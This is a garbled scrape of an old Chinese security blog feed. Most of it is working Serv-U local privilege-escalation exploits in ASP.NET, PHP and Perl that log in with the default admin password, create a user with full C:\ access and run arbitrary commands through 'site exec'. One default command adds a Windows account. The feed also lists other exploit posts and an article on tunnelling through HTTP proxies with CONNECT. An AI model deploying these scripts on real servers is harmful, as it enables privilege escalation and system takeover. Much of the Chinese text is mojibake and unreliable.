Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
Dim Quit As String = "QUIT" & vbcrlf
Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf

'Dim client As New TcpClient
Dim tcpClient As New TcpClient()
Try
tcpClient.Connect("127.0.0.1", port)
Catch eee As Exception
' The full exception text (stack trace included) is written to the page.
response.write(eee.ToString())
response.end
End Try
tcpClient.ReceiveBufferSize = 1024
Dim networkStream As NetworkStream = tcpClient.GetStream()
Rec(networkStream)
Send(networkStream, LoginUser)
Rec(networkStream)
Send(networkStream, LoginPass)
Rec(networkStream)
Send(networkStream, MAINTENANCE)
Rec(networkStream)
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, NewDomain)
Rec(networkStream)
Send(networkStream, NewUser)
Rec(networkStream)
' Second session: the freshly created domain on 43859.
Dim tcpClient2 As New TcpClient()
Try
tcpClient2.Connect("127.0.0.1", 43859)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient2.ReceiveBufferSize = 1024
Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
Rec(networkStream2)
Send(networkStream2, "User lake" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "pass admin123" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "site exec " & Command & vbcrlf)
Rec(networkStream2)
tcpClient2.Close()
' Tear the temporary domain down again on the admin session.
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, Quit)
Rec(networkStream)
tcpClient.Close()
End Sub


Sub Rec(o As Object)
' Reads up to 1024 bytes from the stream and echoes them to the response
' prefixed with "out:". The byte count returned by Read is discarded and the
' buffer is declared with 1025 elements, so the echoed string can carry
' trailing NUL characters; the reply itself is not HTML-encoded.
If o.CanRead Then
Dim bytes(1024) As Byte
o.Read(bytes, 0, 1024)
Dim returndata As String = Encoding.ASCII.GetString(bytes)
response.Write("out:" & returndata & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub

Sub Send(o As Object,data As String)
' Writes data to the stream as ASCII and echoes it to the response prefixed
' with "in: ". Everything sent, the password lines included, ends up in the
' HTML unencoded.
If o.CanWrite Then
Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
o.Write(sendBytes, 0, sendBytes.Length)
response.write("in: " & data & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub

</script>
<html>
<head>
</head>
<body>
<form runat="server">
<p>
<asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2
admin by lake2</asp:Label>
</p>
<p>
<asp:Label id="Label2" runat="server" width="40px">Name</asp:Label>
<asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox>
<br />
<asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label>
<asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
<br />
<asp:Label id="Label4" runat="server" width="40px">Port</asp:Label>
<asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox>
<br />
<asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label>
<asp:TextBox id="Text_cmd" runat="server"></asp:TextBox>
</p>
<p>
<asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button>
</p>
<p>
<hr />
<!-- insert content here -->
</p>
</form>
</body>
</html>


PHP


<?php
if(isset($_POST["Port"])&&isset($_POST["User"])&&isset($_POST["Pass"]))
{
  // Serv-U local privilege-escalation client: an admin session on the
  // posted port creates a domain on 2121 and a user in it, a second
  // session on 2121 runs "site exec" with the posted command, and the
  // domain is deleted again afterwards.
  // Defender notes: neither fsockopen() result is checked, so a refused
  // connection turns every fgets()/fputs() below into a warning on a
  // boolean; the posted command and the raw server replies are echoed into
  // the HTML unencoded; and "&$errno, &$errstr" is call-time
  // pass-by-reference, which PHP 5.4 and later reject at parse time.
  $sendbuf = "";
  $recvbuf = "";
  $domain = "-SETDOMAIN\r\n".
      "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n".
      "-TZOEnable=0\r\n".
      " TZOKey=\r\n";
  $adduser = "-SETUSERSETUP\r\n".
      "-IP=0.0.0.0\r\n".
      "-PortNo=2121\r\n".
      "-User=Will_Be\r\n".
      "-Password=Will_Be\r\n".
      "-HomeDir=c:\\\r\n".
      "-LoginMesFile=\r\n".
      "-Disable=0\r\n".
      "-RelPaths=1\r\n".
      "-NeedSecure=0\r\n".
      "-HideHidden=0\r\n".
      "-AlwaysAllowLogin=0\r\n".
      "-ChangePassword=0\r\n".
      "-QuotaEnable=0\r\n".
      "-MaxUsersLoginPerIP=-1\r\n".
      "-SpeedLimitUp=0\r\n".
      "-SpeedLimitDown=0\r\n".
      "-MaxNrUsers=-1\r\n".
      "-IdleTimeOut=600\r\n".
      "-SessionTimeOut=-1\r\n".
      "-Expire=0\r\n".
      "-RatioUp=1\r\n".
      "-RatioDown=1\r\n".
      "-RatiosCredit=0\r\n".
      "-QuotaCurrent=0\r\n".
      "-QuotaMaximum=0\r\n".
      "-Maintenance=None\r\n".
      "-PasswordType=Regular\r\n".
      "-Ratios=None\r\n".
      " Access=c:\\|RELP\r\n";
  $deldomain="-DELETEDOMAIN\r\n".
      "-IP=0.0.0.0\r\n".
      " PortNo=2121\r\n";
  // Admin session; the return value is never tested for false.
  $sock = fsockopen("127.0.0.1", $_POST["Port"], &$errno, &$errstr, 10);
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "USER ".$_POST["User"]."\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "PASS ".$_POST["Pass"]."\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "SITE MAINTENANCE\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = $domain;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = $adduser;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  echo "**********************************************************<br>";
  echo "Starting Exploit ...<br>";
  echo "**********************************************************<br>";
  // Second session on the domain just created; likewise unchecked.
  $exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10);
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "USER Will_Be\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "PASS Will_Be\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "site exec ".$_POST["Command"]."\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: site exec</font> <font color=green>".$_POST["Command"]."</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  echo "**********************************************************<br>";
  echo "Starting Delete Domain ...<br>";
  echo "**********************************************************<br>";
  $sendbuf = $deldomain;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  fclose($sock);
  fclose($exp);
}
?>
<html>
<head>
<meta http-equiv="Content-Type" c>
<title>Serv-U Local Exploit By Will_Be</title>
</head>

<body>
<form method="post">
LocalPort:
<input name="Port" type="text" id="Port" value="43958">
<br>
LocalUser:
<input name="User" type="text" id="User" value="LocalAdministrator">
<br>
LocalPass:
<input name="Pass" type="text" id="Pass" value="#l@$ak#.lk;0@P">
<br>
Command銆:
<input name="Command" type="text" id="Command" value="net user Will_Be heihei /add">
<br>
<input type="submit" name="Submit" value="鎻愪氦">銆銆
<input type="reset" name="Submit" value="閲嶇疆">
</form>
</body>
</html>


Perl
Perl鐨勯粯璁ゅ畨瑁呰礬寰勬槸錛欳:\Perl
鐒跺悗浣跨敤錛?br>perl 浣犵殑pl鏂囦歡鐨勮礬寰勩?br>鍦╓EBSHELL涓殑璺緞鏄繖鏍風殑錛?br>C:\perl\bin\perl 浣犵殑pl鏂囦歡鐨勮礬寰?
#!/usr/bin/perl
use IO::Socket;

# Serv-U local privilege-escalation client written to run as a CGI (it
# prints its own Content-type header). Defender notes: the admin session is
# driven blind -- fixed sleep()s stand in for reading replies and the reply
# text is only collected after QUIT -- so a failed login or command cannot
# be told from success; $dir is assigned but never used; both IO::Socket and
# IO::Socket::INET are loaded.
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

$addr = "127.0.0.1";
$ftpport = 21;
$adminport = 43958;
$adminuser = "LocalAdministrator";
# Single quotes keep "$ak" from being interpolated.
$adminpass = '#l@$ak#.lk;0@P';
$user = "h4x0r";
$password = "123456";
$homedir = 'C:\\';
$dir = 'C:\\WINNT\\System32\\';


use IO::Socket::INET;

$sock = IO::Socket::INET->new("127.0.0.1:$adminport") || die "fail";

print "TEST<br><br>";

print $sock "USER $adminuser\r\n";
sleep (1);
print $sock "PASS $adminpass\r\n";
sleep(1);
print $sock "SITE MAINTENANCE\r\n";
sleep(1);
print $sock "-SETUSERSETUP\r\n";
print $sock "-IP=".$addr."\r\n";
print $sock "-PortNo=".$ftpport."\r\n";
print $sock "-User=".$user."\r\n";
print $sock "-Password=".$password."\r\n";
print $sock "-HomeDir=".$homedir."\r\n";
print $sock "-LoginMesFile=\r\n";
print $sock "-Disable=0\r\n";
print $sock "-RelPaths=0\r\n";
print $sock "-NeedSecure=0\r\n";
print $sock "-HideHidden=0\r\n";
print $sock "-AlwaysAllowLogin=0\r\n";
print $sock "-ChangePassword=1\r\n";
print $sock "-QuotaEnable=0\r\n";
print $sock "-MaxUsersLoginPerIP=-1\r\n";
print $sock "-SpeedLimitUp=-1\r\n";
print $sock "-SpeedLimitDown=-1\r\n";
print $sock "-MaxNrUsers=-1\r\n";
print $sock "-IdleTimeOut=600\r\n";
print $sock "-SessionTimeOut=-1\r\n";
print $sock "-Expire=0\r\n";
print $sock "-RatioUp=1\r\n";
print $sock "-RatioDown=1\r\n";
print $sock "-RatiosCredit=0\r\n";
print $sock "-QuotaCurrent=0\r\n";
print $sock "-QuotaMaximum=0\r\n";
print $sock "-Maintenance=System\r\n";
print $sock "-PasswordType=Regular\r\n";
print $sock "-Ratios=None\r\n";
print $sock " Access=".$homedir."|RWAMELCDP\r\n";
print $sock "QUIT\r\n";


# Everything the server wrote is read only now, after QUIT.
@ret=<$sock>;
print "@ret";

close(STDERR);
close(STDOUT);
exit;


鍙跺瓙 2007-08-04 15:17 鍙戣〃璇勮
]]>
Symantec 鏍稿績椹卞姩 symtdi.sys 鏈湴鏉冮檺鎻愬崌婕忔礊http://www.shnenglu.com/elva/archive/2007/07/20/28428.html鍙跺瓙鍙跺瓙Fri, 20 Jul 2007 04:15:00 GMThttp://www.shnenglu.com/elva/archive/2007/07/20/28428.htmlhttp://www.shnenglu.com/elva/comments/28428.htmlhttp://www.shnenglu.com/elva/archive/2007/07/20/28428.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/28428.htmlhttp://www.shnenglu.com/elva/services/trackbacks/28428.html闃呰鍏ㄦ枃

鍙跺瓙 2007-07-20 12:15 鍙戣〃璇勮
]]>
Rav 鏍稿績椹卞姩 memscan.sys 鏈湴鏉冮檺鎻愬崌婕忔礊http://www.shnenglu.com/elva/archive/2007/07/20/28427.html鍙跺瓙鍙跺瓙Fri, 20 Jul 2007 04:14:00 GMThttp://www.shnenglu.com/elva/archive/2007/07/20/28427.htmlhttp://www.shnenglu.com/elva/comments/28427.htmlhttp://www.shnenglu.com/elva/archive/2007/07/20/28427.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/28427.htmlhttp://www.shnenglu.com/elva/services/trackbacks/28427.html闃呰鍏ㄦ枃

鍙跺瓙 2007-07-20 12:14 鍙戣〃璇勮
]]>
Linux Kernel do_mremap VMA鏈湴鏉冮檺鎻愬崌婕忔礊http://www.shnenglu.com/elva/archive/2007/06/01/25237.html鍙跺瓙鍙跺瓙Thu, 31 May 2007 19:10:00 GMThttp://www.shnenglu.com/elva/archive/2007/06/01/25237.htmlhttp://www.shnenglu.com/elva/comments/25237.htmlhttp://www.shnenglu.com/elva/archive/2007/06/01/25237.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/25237.htmlhttp://www.shnenglu.com/elva/services/trackbacks/25237.html闃呰鍏ㄦ枃

鍙跺瓙 2007-06-01 03:10 鍙戣〃璇勮
]]>
Kaspersky Anti-Virus 榪滅▼鍒犻櫎浠繪剰鏂囦歡婕忔礊鍒嗘瀽鍙婂埄鐢ㄤ唬鐮?/title><link>http://www.shnenglu.com/elva/archive/2007/05/31/25224.html</link><dc:creator>鍙跺瓙</dc:creator><author>鍙跺瓙</author><pubDate>Thu, 31 May 2007 12:44:00 GMT</pubDate><guid>http://www.shnenglu.com/elva/archive/2007/05/31/25224.html</guid><wfw:comment>http://www.shnenglu.com/elva/comments/25224.html</wfw:comment><comments>http://www.shnenglu.com/elva/archive/2007/05/31/25224.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.shnenglu.com/elva/comments/commentRss/25224.html</wfw:commentRss><trackback:ping>http://www.shnenglu.com/elva/services/trackbacks/25224.html</trackback:ping><description><![CDATA[     鎽樿:   <a href='http://www.shnenglu.com/elva/archive/2007/05/31/25224.html'>闃呰鍏ㄦ枃</a><img src ="http://www.shnenglu.com/elva/aggbug/25224.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.shnenglu.com/elva/" target="_blank">鍙跺瓙</a> 2007-05-31 20:44 <a href="http://www.shnenglu.com/elva/archive/2007/05/31/25224.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>鍛戒護鎵瑰鐞嗗疄鐜板3389鐧誨綍鐨勬棩蹇楄褰?http://www.shnenglu.com/elva/archive/2007/05/24/24732.html鍙跺瓙鍙跺瓙Wed, 23 May 2007 17:50:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/24/24732.htmlhttp://www.shnenglu.com/elva/comments/24732.htmlhttp://www.shnenglu.com/elva/archive/2007/05/24/24732.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/24732.htmlhttp://www.shnenglu.com/elva/services/trackbacks/24732.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-24 01:50 鍙戣〃璇勮
]]>
鍒ゆ柇褰撳墠鐢ㄦ埛鏄惁涓虹郴緇熺鐞嗗憳http://www.shnenglu.com/elva/archive/2007/05/14/24080.html鍙跺瓙鍙跺瓙Sun, 13 May 2007 16:56:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/14/24080.htmlhttp://www.shnenglu.com/elva/comments/24080.htmlhttp://www.shnenglu.com/elva/archive/2007/05/14/24080.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/24080.htmlhttp://www.shnenglu.com/elva/services/trackbacks/24080.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-14 00:56 鍙戣〃璇勮
]]>
2000涓嬪彲鎵ц鏂囦歡淇敼鑷韓http://www.shnenglu.com/elva/archive/2007/05/14/24079.html鍙跺瓙鍙跺瓙Sun, 13 May 2007 16:55:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/14/24079.htmlhttp://www.shnenglu.com/elva/comments/24079.htmlhttp://www.shnenglu.com/elva/archive/2007/05/14/24079.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/24079.htmlhttp://www.shnenglu.com/elva/services/trackbacks/24079.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-14 00:55 鍙戣〃璇勮
]]>
絎竴涓敮鎸?000鍜?003涓嬪畬緹庤繘琛岀敤鎴峰厠闅嗙殑C婧愮爜(鍙湪webshell閲岀洿鎺ヨ繍琛?http://www.shnenglu.com/elva/archive/2007/05/14/24078.html鍙跺瓙鍙跺瓙Sun, 13 May 2007 16:49:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/14/24078.htmlhttp://www.shnenglu.com/elva/comments/24078.htmlhttp://www.shnenglu.com/elva/archive/2007/05/14/24078.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/24078.htmlhttp://www.shnenglu.com/elva/services/trackbacks/24078.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-14 00:49 鍙戣〃璇勮
]]>
MS Windows GDI Local Privilege Escalation Exploit (MS07-017) http://www.shnenglu.com/elva/archive/2007/05/08/23634.html鍙跺瓙鍙跺瓙Tue, 08 May 2007 08:49:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/08/23634.htmlhttp://www.shnenglu.com/elva/comments/23634.htmlhttp://www.shnenglu.com/elva/archive/2007/05/08/23634.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/23634.htmlhttp://www.shnenglu.com/elva/services/trackbacks/23634.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-08 16:49 鍙戣〃璇勮
]]>
甯﹁緇嗚В閲婄殑鍐插嚮娉㈠師浠g爜http://www.shnenglu.com/elva/archive/2007/05/08/23633.html鍙跺瓙鍙跺瓙Tue, 08 May 2007 08:43:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/08/23633.htmlhttp://www.shnenglu.com/elva/comments/23633.htmlhttp://www.shnenglu.com/elva/archive/2007/05/08/23633.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/23633.htmlhttp://www.shnenglu.com/elva/services/trackbacks/23633.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-08 16:43 鍙戣〃璇勮
]]>
HTTP Tunnelinghttp://www.shnenglu.com/elva/archive/2007/05/06/23526.html鍙跺瓙鍙跺瓙Sun, 06 May 2007 08:51:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/06/23526.htmlhttp://www.shnenglu.com/elva/comments/23526.htmlhttp://www.shnenglu.com/elva/archive/2007/05/06/23526.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/23526.htmlhttp://www.shnenglu.com/elva/services/trackbacks/23526.htmlIntroduction

HTTP Tunneling

HTTP is a text-based protocol to retrieve Web pages through a Web browser. Mostly, if you are on a LAN connection, you are behind a proxy server; this proxy server has one HTTP proxy running on some defined port. In your Internet Explorer's Connection option, you specify LAN settings as required. This proxy server is running a text-based protocol, so you can only get HTTP-related data from the outside network, right? Well, there is a small loophole that lets you go through the HTTP proxy and connect to the outside world with any binary protocol, or even your own protocol. It's through HTTPS.

HTTPS Explanation

In HTTPS, data is transferred from browser to server and server to browser in a secure manner. It's a binary protocol; when it goes through a proxy, the proxy doesn't understand anything. The proxy just opens a binary stream and lets server and client exchange data. So we can fool the proxy server, connect to any server, and exchange data; the proxy server will think that we are doing some secure HTTP session. (For the same reason, proxies are normally configured to accept CONNECT only for port 443; a proxy that accepts CONNECT to arbitrary ports is effectively an open TCP relay.)

For HTTPS, your browser connects to a proxy server and sends a command:

CONNECT neurospeech.com:443 HTTP/1.0 <CR><LF>
Host: neurospeech.com:443<CR><LF>
[... other HTTP header lines ending with <CR><LF> if required]
<CR><LF>    // Last Empty Line

Then, the proxy server treats this as some HTTP Secure Session, and opens a binary stream to the required server and port as defined. If a connection is established, the proxy server returns the following response:

HTTP/1.0 200 Connection Established<CR><LF>
[.... other HTTP header lines ending with <CR><LF>..
ignore all of them]
<CR><LF>    // Last Empty Line

Now, the browser is connected to the end server and can exchange data in both a binary and secure form.

How to Do This

Now, it's your program's turn to fool the proxy server and behave as Internet Explorer behaves for Secure HTTP.

  1. Connect to Proxy Server first.
  2. Issue CONNECT Host:Port HTTP/1.1<CR><LF> (with HTTP/1.1 a Host: header is mandatory; the sample code below uses HTTP/1.0, where it is optional).
  3. Issue <CR><LF>.
  4. Wait for a line of response. If it contains HTTP/1.X 200, the connection is successful.
  5. Read further lines of response until you receive an empty line.
  6. Now, you are connected to the outside world through a proxy. Do any data exchange you want.

Sample Source Code

  // You need to connect to mail.yahoo.com on port 25
// Through a proxy on 192.0.1.1, on HTTP Proxy 4480
// CSocketClient is Socket wrapping class
// When you apply operator << on CString, it writes CString
// To Socket ending with CRLF
// When you apply operator >> on CString, it receives
// a Line of response from socket until CRLF
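try
{
    CString Request, Response;
    CSocketClient Client;
    // Open the TCP connection to the proxy itself, not to the final host.
    Client.ConnectTo("192.0.1.1", 4480);
    // Ask the proxy to open a raw byte tunnel to the target host:port.
    Request = "CONNECT mail.yahoo.com:25 HTTP/1.0";
    Client << Request;
    // An empty line terminates the request headers.
    Request = "";
    Client << Request;
    // The status line comes back as "HTTP/1.x <code> <reason>".
    Client >> Response;
    // Drop the version token. If there is no space at all, Find() returns -1,
    // Mid(0) keeps the whole line and the "200" test below fails as intended.
    int n = Response.Find(' ');
    Response = Response.Mid(n + 1);
    if (Response.Left(3) != "200")
    {
        // The proxy refused the tunnel. Report it and stop here: the original
        // code fell through and went on to read headers and "talk SMTP" on a
        // connection that was never established.
        AfxMessageBox(Response);
    }
    else
    {
        // Consume the remaining response headers up to the blank line;
        // everything after that blank line belongs to the tunnelled protocol.
        // The status code is the only validation performed; anything the
        // proxy or the far end sends afterwards is trusted as-is.
        while (true)
        {
            Client >> Response;
            if (Response.IsEmpty())
                break;
        }
        // Tunnel is up: the socket now carries mail.yahoo.com:25.
        // Continue with the SMTP dialogue here.
    }
}
catch (CSocketException * pE)
{
    pE->ReportError();
}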

Library Source Code

The Dns.h file contains all DNS-related source code. It uses other libraries, as SocketEx.h, SocketClient.h, and NeuroBuffer.h.

CSocketEx

A wrapper class around the socket functions. (CSocket is very heavy and unreliable if you don't have an exact idea of how it works.) All the functions have the same names as in CSocket. You can use this class directly.

CSocketClient

Derived from CSocketEx and throws proper exceptions with details of Winsock errors. It defines two operators, >> and <<, for easy sending and receiving; it also changes network to host and host to network order of bytes if required.

CHttpProxySocketClient

Derived from CSocketClient, you can call the SetProxySettings(ProxyServer,Port) method and set proxy settings. Then, you can connect to the desired host and port as you need. The ConnectTo method is overridden, and it automatically implements an HTTP proxy protocol and gives you a connection without any hassle.

How to Use CHttpProxySocketClient

  // e.g. You need to connect to mail.yahoo.com on port 25
// Through a proxy on 192.0.1.1, on HTTP Proxy 4480
// CSocketClient is Socket wrapping class
// When you apply operator << on CString, it writes CString
// To Socket ending with CRLF
// When you apply operator >> on CString, it receives
// Line of response from socket until CRLF
try
{
    // Same goal as the first sample, but the CONNECT handshake with the
    // proxy is performed inside CHttpProxySocketClient::ConnectTo.
    CHttpProxySocketClient Client;

    // Proxy address and port; note this sample uses port 1979 while the
    // header comment above still says 4480.
    Client.SetProxySettings("192.0.1.1", 1979);

    // Issued through the proxy: the CONNECT request and its response are
    // handled for us, and afterwards the socket carries mail.yahoo.com:25.
    Client.ConnectTo("mail.yahoo.com", 25);

    // Without a prior SetProxySettings() call the very same ConnectTo() goes
    // straight to the host, so this class works both with and without a
    // proxy and no extra code is needed.
}
catch (CSocketException * pE)
{
    pE->ReportError();
}

Note: I usually don't split code into separate .h and .cpp files, because reusing them somewhere else later means moving both files around. So I put all the code in the .h file only and don't write a .cpp file unless it's required. You need to copy only the SocketEx.h, SocketClient.h, and HttpProxySocket.h files into your project's directory, and add the line:

#include "HttpProxySocket.h"

after your:

#if !defined(.....

and similar boilerplate of your Visual Studio-generated file. If you put anything above this, you will get a large number of errors.

 



鍙跺瓙 2007-05-06 16:51 鍙戣〃璇勮
]]>
榪滅▼妗岄潰瀹夊叏鍏ㄨВ錛堜笅錛?/title><link>http://www.shnenglu.com/elva/archive/2007/05/06/23524.html</link><dc:creator>鍙跺瓙</dc:creator><author>鍙跺瓙</author><pubDate>Sun, 06 May 2007 08:36:00 GMT</pubDate><guid>http://www.shnenglu.com/elva/archive/2007/05/06/23524.html</guid><wfw:comment>http://www.shnenglu.com/elva/comments/23524.html</wfw:comment><comments>http://www.shnenglu.com/elva/archive/2007/05/06/23524.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.shnenglu.com/elva/comments/commentRss/23524.html</wfw:commentRss><trackback:ping>http://www.shnenglu.com/elva/services/trackbacks/23524.html</trackback:ping><description><![CDATA[     鎽樿:   <a href='http://www.shnenglu.com/elva/archive/2007/05/06/23524.html'>闃呰鍏ㄦ枃</a><img src ="http://www.shnenglu.com/elva/aggbug/23524.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.shnenglu.com/elva/" target="_blank">鍙跺瓙</a> 2007-05-06 16:36 <a href="http://www.shnenglu.com/elva/archive/2007/05/06/23524.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>榪滅▼妗岄潰瀹夊叏鍏ㄨВ(涓?http://www.shnenglu.com/elva/archive/2007/05/06/23523.html鍙跺瓙鍙跺瓙Sun, 06 May 2007 08:35:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/06/23523.htmlhttp://www.shnenglu.com/elva/comments/23523.htmlhttp://www.shnenglu.com/elva/archive/2007/05/06/23523.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/23523.htmlhttp://www.shnenglu.com/elva/services/trackbacks/23523.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-06 16:35 鍙戣〃璇勮
]]>